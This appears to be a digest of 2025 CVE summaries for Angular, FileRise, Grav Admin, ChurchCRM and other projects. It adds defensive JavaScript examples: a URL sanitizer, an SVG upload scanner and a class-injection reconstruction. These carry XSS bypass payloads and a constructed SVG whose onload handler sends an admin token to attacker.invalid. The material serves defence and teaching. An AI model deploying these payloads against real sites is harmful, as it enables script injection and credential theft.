Overview
CVE-2025-66412 is a Stored Cross-Site Scripting (XSS) vulnerability affecting Angular versions prior to 21.0.2, 20.3.15, and 19.2.17. It resides in the Angular Template Compiler and allows attackers to inject malicious scripts into Angular applications because the compiler's security schema is incomplete.
Technical Details
The root cause is an incomplete security schema within the Angular Template Compiler: the compiler fails to identify certain URL-holding attributes as requiring strict URL sanitization. This lets attackers bypass Angular's built-in sanitization by injecting scripts through attributes that can carry `javascript:` URLs…
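The point of a "strict URL security context" is that a URL attribute has to be checked by scheme, after the same normalisation a browser applies, and not by a substring match. The block below is an added example written for this page, not Angular's code: it puts a naive prefix check beside a scheme-aware sanitizer and lists constructed payloads that pass the former and not the latter. The `SAFE_SCHEMES` allowlist and the `unsafe:` prefix convention (which Angular's sanitizer also uses) are this example's assumptions.

```javascript
// Added example, not Angular's code: a scheme-aware URL sanitizer of the kind a
// URL-holding attribute needs, next to the naive substring check it replaces.
// Browsers strip ASCII tab/CR/LF anywhere in a URL, ignore leading control
// characters and whitespace, and compare the scheme case-insensitively, so a
// check for the literal prefix "javascript:" misses the payloads below.

// Naive check: rejects only the exact lowercase prefix.
function naiveIsSafeUrl(url) {
  return !String(url).startsWith('javascript:');
}

// Schemes allowed in href/src-style attributes. The allowlist is an assumption
// for this example; extend it deliberately, never with "javascript".
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto', 'tel', 'ftp', 'sms']);

// Returns the input unchanged when it is safe, otherwise the input prefixed with
// "unsafe:" (the convention Angular's sanitizer uses), which leaves a URL with an
// unknown scheme that no browser will execute.
function sanitizeUrl(url) {
  const raw = String(url);
  // 1. Tab, LF and CR are dropped anywhere by the browser's URL parser.
  let s = raw.replace(/[\t\n\r]/g, '');
  // 2. Leading and trailing C0 controls and spaces are ignored as well.
  s = s.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  // 3. A scheme is letters/digits/+/-/. followed by ':'; compare it lower-cased.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  if (m === null) {
    return raw; // no scheme: relative URL such as "/path", "?q=1" or "#frag"
  }
  return SAFE_SCHEMES.has(m[1].toLowerCase()) ? raw : 'unsafe:' + raw;
}

// Constructed payloads that the naive check passes and the sanitizer blocks.
const BYPASS_SAMPLES = [
  'JaVaScRiPt:alert(1)',        // mixed-case scheme
  'java\tscript:alert(1)',       // tab inside the scheme
  ' javascript:alert(1)',        // leading space
  '\u0001javascript:alert(1)',   // leading control character
  'javascript\n:alert(1)',       // newline before the colon
];

// Returns the samples that slip past naiveIsSafeUrl but are caught by sanitizeUrl.
function naiveBypasses() {
  return BYPASS_SAMPLES.filter(
    (u) => naiveIsSafeUrl(u) && sanitizeUrl(u).startsWith('unsafe:'));
}
```

Every attribute the template compiler classifies as URL-holding gets this treatment; an attribute missing from the schema gets none, which is exactly the gap the advisory describes.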
Overview
CVE-2025-66410 identifies a critical vulnerability in Gin-Vue-Admin, a backstage management system built on Vue and Gin. Present in versions 2.8.6 and earlier, it allows attackers to delete arbitrary files on the server. By manipulating the `FileMd5` parameter, an attacker can cause data loss and system unavailability.
Technical Details
The vulnerability stems from insufficient validation and sanitization of the FileMd5 parameter used in file deletion operations. An attacker can craft a request containing a manipulated FileMd5 value that points to any file or directory accessible to the application process. The lack…
Overview
CVE-2025-66405 describes a Server-Side Request Forgery (SSRF) vulnerability in versions of Portkey.ai Gateway prior to 1.14.0. Portkey.ai Gateway is designed to be a fast AI gateway with integrated guardrails. The vulnerability allowed attackers to force the gateway to make requests to arbitrary internal or external servers, leading to information disclosure or other malicious activity.
Technical Details
The vulnerability stemmed from how the gateway handled the `x-portkey-custom-host` request header. Prior to version 1.14.0, the gateway gave the value supplied in this header priority when determining the destination `baseURL` for proxy requests. The proxy route would then append a…
Overview
A stored cross-site scripting (XSS) vulnerability, CVE-2025-66403, has been discovered in FileRise, a self-hosted web-based file manager. It affects versions prior to 2.2.3 and stems from the application's failure to sanitize uploaded SVG files, allowing attackers to inject scripts that execute when other users view the compromised file.
Technical Details
FileRise accepts SVG files without adequate validation or sanitization of embedded script content. SVGs are XML documents and can carry inline JavaScript and event-handler attributes. When a malicious SVG containing such scripts is uploaded and subsequently viewed within the FileRise…
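An SVG becomes executable through a handful of constructs: script elements, event-handler attributes, `javascript:` URLs in `href`/`xlink:href` (possibly hidden behind character references), and `foreignObject`, which can embed arbitrary HTML. The block below is an added example for this page, not FileRise's code (that project is PHP): a triage scanner for uploads that flags those constructs. The two sample files are constructed for the example.

```javascript
// Added example, not FileRise's code: a triage scanner for uploaded SVGs that
// flags the constructs which make an SVG executable in a browser. The sample
// files below are constructed for this example.

const BENIGN_SVG =
  '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">' +
  '<circle cx="5" cy="5" r="4" fill="red"/><text x="1" y="9" font-size="2">ok</text></svg>';

const MALICIOUS_SVG = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="fetch('/api/admin/token',{credentials:'include'}).then(r=>r.text()).then(t=>fetch('https://attacker.invalid/?t='+t))">
  <script>console.log(document.cookie)</script>
  <a xlink:href="&#106;avascript:alert(1)"><text x="1" y="5">click</text></a>
  <foreignObject width="100" height="100"><iframe xmlns="http://www.w3.org/1999/xhtml" src="https://attacker.invalid"></iframe></foreignObject>
</svg>`;

// Numeric and a few named character references hide "javascript:" from a plain
// substring match; decode them before inspecting a URL value.
function decodeRefs(value) {
  const named = { tab: '\t', newline: '\n', colon: ':' };
  return value
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => String.fromCodePoint(parseInt(d, 10)))
    .replace(/&(tab|newline|colon);/gi, (_, n) => named[n.toLowerCase()]);
}

// Returns a list of human-readable findings; an empty list means nothing flagged.
function scanSvg(svgText) {
  const findings = [];
  // 1. <script> in any case, with or without a namespace prefix
  if (/<\s*(?:[\w-]+:)?script\b/i.test(svgText)) findings.push('script element');
  // 2. event-handler attributes (onload, onclick, onbegin, ...)
  for (const m of svgText.matchAll(/[\s"'](on[a-z]+)\s*=/gi)) {
    findings.push(`event handler attribute ${m[1]}`);
  }
  // 3. href / xlink:href carrying a scripting or HTML data URL; whitespace and
  //    control characters inside the value are stripped the way browsers do.
  for (const m of svgText.matchAll(/(?:xlink:)?href\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi)) {
    const rawValue = m[1] ?? m[2] ?? m[3];
    const v = decodeRefs(rawValue).replace(/[\u0000-\u0020]/g, '').toLowerCase();
    if (v.startsWith('javascript:') || v.startsWith('vbscript:') || v.startsWith('data:text/html')) {
      findings.push(`scripting URL in href: ${rawValue}`);
    }
  }
  // 4. foreignObject lets the SVG embed arbitrary HTML, iframes included
  if (/<\s*foreignObject\b/i.test(svgText)) findings.push('foreignObject element');
  // 5. entity declarations: server-side XML parsers may expand them (XXE)
  if (/<!ENTITY/i.test(svgText)) findings.push('entity declaration');
  return findings;
}
```

Treat the scanner as a detection step, not the fix: regexes over XML are bypassable. The durable controls are a real SVG sanitizer on upload, serving user files from a separate origin, and sending them with `Content-Disposition: attachment` plus a restrictive `Content-Security-Policy` so that an SVG that does slip through cannot run in the application's origin.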
Overview
CVE-2025-66401 describes a critical command injection vulnerability in MCP Watch version 0.1.2 and earlier. MCP Watch is a security scanner for Model Context Protocol (MCP) servers. The vulnerability allows an attacker to execute arbitrary commands on the host machine, potentially leading to complete system compromise.
Technical Details
The vulnerability resides in the cloneRepo method of the MCPScanner class. The method takes a user-provided githubUrl argument and passes it directly to the operating system shell via execSync, without sanitizing or validating the input before the command runs. By…
Overview
CVE-2025-66400 affects mdast-util-to-hast, a utility for transforming Markdown abstract syntax trees (mdast) into HTML abstract syntax trees (hast). Versions 13.0.0 through 13.2.0 are vulnerable. The flaw lets an attacker inject arbitrary class names into the rendered HTML by using character references in the Markdown source, which in turn lets them style rendered Markdown, code elements in particular, so that it blends in with the rest of the page, enabling phishing and other deceptive content.
Technical Details
The vulnerability stems from improper handling of character references when converting Markdown to HTML.…
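The mechanism is an order-of-operations bug: CommonMark permits character references in a fenced code block's info string, and the first whitespace-delimited word of that string becomes the language. If the word is split off before references are decoded, a reference that decodes to a space lands inside the language, and `class="language-<lang>"` now carries two classes, the second chosen by the author. The block below is an added example for this page, not mdast-util-to-hast's code: it reconstructs the vulnerable order beside a hardened one and renders the resulting `<code>` tag. The token alphabet, function names and the attacker input are this example's own.

```javascript
// Added example, not mdast-util-to-hast's code: a reconstruction of the class
// injection via character references in a fenced code block's info string.

function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d{1,7});/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
}

// Vulnerable order: split the raw info string on whitespace, then decode the
// first word. "js&#x20;foo" has no literal whitespace, so the whole string is
// the "language", and decoding then puts a space inside it.
function vulnerableLanguageClass(info) {
  const first = info.trim().split(/\s+/)[0];
  if (!first) return undefined;
  return 'language-' + decodeCharRefs(first);
}

// Hardened: decode first, re-split on ASCII whitespace (what the class
// attribute is split on), and accept only a conservative language token. The
// token alphabet is this example's choice; it admits c++, c#, f#, vue.js.
const LANG_TOKEN = /^[A-Za-z0-9_+#.-]+$/;
function safeLanguageClass(info) {
  const first = decodeCharRefs(info.trim()).split(/[ \t\n\f\r]+/)[0];
  if (!first || !LANG_TOKEN.test(first)) return undefined;
  return 'language-' + first;
}

// Renders the opening <code> tag as a Markdown-to-HTML pipeline would. Quotes
// and ampersands are escaped as any serializer does, so the attacker's reach
// is the class list and nothing beyond it.
function renderCodeOpenTag(info, languageClassFn) {
  const cls = languageClassFn(info);
  if (cls === undefined) return '<code>';
  return `<code class="${cls.replace(/&/g, '&amp;').replace(/"/g, '&quot;')}">`;
}

// Constructed attacker input: "js" followed by an encoded space and a class the
// host page uses for body text, so the code block stops looking like code.
const ATTACKER_INFO = 'js&#x20;site-body-text';
```

The same shape appears wherever a token is validated before it is decoded; the check has to run on the value the consumer will see, which is the decoded one.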
Overview
CVE-2025-66313 identifies a time-based blind SQL injection vulnerability in ChurchCRM, an open-source church management system, affecting versions 6.2.0 and earlier. The flaw lies in the handling of the 1FieldSec parameter: an attacker can inject SQL, for example a SLEEP() call, to produce deterministic server-side delays, which confirms that the value is placed directly into a SQL query without parameterization or sanitization.
Technical Details
The root cause is improper handling of user-supplied input in the ChurchCRM application, specifically the 1FieldSec parameter. By injecting SQL code into this…
Overview
CVE-2025-66312 is a Stored Cross-Site Scripting (XSS) vulnerability in the Admin plugin for Grav CMS, a flat-file content management system, affecting versions prior to 1.11.0-beta.1. The Admin plugin provides an HTML interface for configuring Grav and managing content. Successful exploitation lets an attacker store malicious JavaScript on the server that executes in the browsers of other users who open the affected pages.
Technical Details
The vulnerability exists in the /admin/accounts/groups/Grupo endpoint of the Grav Admin plugin; the data[readableName] parameter is susceptible to Stored XSS. An attacker can…
Overview
A critical Stored Cross-Site Scripting (XSS) vulnerability, CVE-2025-66311, has been discovered in the Admin plugin for Grav, a popular flat-file CMS, affecting versions prior to 1.11.0-beta.1. It allows attackers to inject malicious scripts into page frontmatter that execute whenever an affected page is opened through the administrative interface. Users of the Grav Admin plugin are strongly urged to update to version 1.11.0-beta.1 or later.
Technical Details
The vulnerability resides in the /admin/pages/[page] endpoint of the Grav Admin plugin. Malicious scripts can be injected through the following parameters:…
Overview
CVE-2025-66310 identifies a Stored Cross-Site Scripting (XSS) vulnerability in the Admin plugin for Grav CMS, which provides a web-based interface for managing Grav installations. It affects versions prior to 1.11.0-beta.1 and allows attackers to inject malicious JavaScript into the page configuration, which can lead to account compromise and other severe consequences.
Technical Details
The vulnerability resides in the /admin/pages/[page] endpoint of the Grav Admin plugin; the data[header][template] parameter is vulnerable to Stored XSS. An attacker can inject malicious JavaScript into this parameter, which is then saved as part of the page's frontmatter. This…